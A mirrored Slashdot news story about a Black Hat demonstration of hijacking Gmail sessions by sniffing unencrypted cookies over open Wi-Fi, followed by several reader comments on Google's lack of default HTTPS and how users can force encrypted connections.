Slashdot Mirror

← Back to Stories (view on slashdot.org)

Point-and-Click Gmail Hacking Shown at Black Hat

Posted by Zonk on from the man-they-get-all-the-fun-demos dept.

not5150 writes "Using Gmail or most other webmail programs over an unsecured access point just got a bit more dangerous. At Black Hat Robert Graham, CEO of errata security, showed how to capture and clone session cookies very quickly over connections without encryption. He even hijacked a shocked attendee's Gmail account in the middle of his presentation. 'While Ou was typing, Graham was running Ferret and sniffing all the cookies that were being sent from Ou's laptop and Google. Graham then clicked on Ou's IP address and Gmail page, complete with Ou's recently sent message on the screen. We photographed both Graham's and Ou's laptop at that time and posted it to the picture gallery. You'll see that the contents are exactly the same.'"

6 of 260 comments (clear)

  1. Bottom line by Kadin2048 · · Score: 5, Informative

    I think the upshot of this isn't really "look at us, we can sniff plaintext Wifi connections," but "look at one of the biggest players in web mail use plaintext connections even though they ought to know it's a hideously bad idea."

    It's more of an indictment of Google than anything, because they default to unencrypted HTTP rather than HTTPS, and most users won't know that they can go to https://mail.google.com/mail/ to force smarter behavior.

    --
    "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
  2. Re:Slow News day? by Anonymous Coward · · Score: 5, Informative

    if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in.
    You have no idea how SSL works.
  3. Re:Could be fixed easily by Google. Shame. by Bob+535604 · · Score: 5, Informative

    I fail to see how the average person, as usual, being lax about their security is in any way Google's fault. This was something I found immediately, just because I won't check my email without a secure connection.
    A lot of people wouldn't know about this or even look for it and you know it. Google could make https the default or even mandatory, and it would completely kill this entire issue.
  4. Re:Could be fixed easily by Google. Shame. by TheRaven64 · · Score: 5, Insightful

    A huge part of security is having sane defaults. If you support 'secure' and 'insecure' you should default to 'secure,' and let users who know what they are doing, and need 'insecure' behaviour opt into it. You shouldn't default to 'insecure' and make it the users' responsibility to select 'secure.'

    --
    I am TheRaven on Soylent News
  5. Re:Slow News day? by Kartoffel · · Score: 5, Informative

    That's easy enough to fix with a Firefox plugin: http://www.customizegoogle.com/

  6. Re:Slow News day? by tizan · · Score: 5, Insightful

    I believe if you use https://gmail.google.com/ (note gmail instead of mail) your whole mail session is always encripted and not the login page only.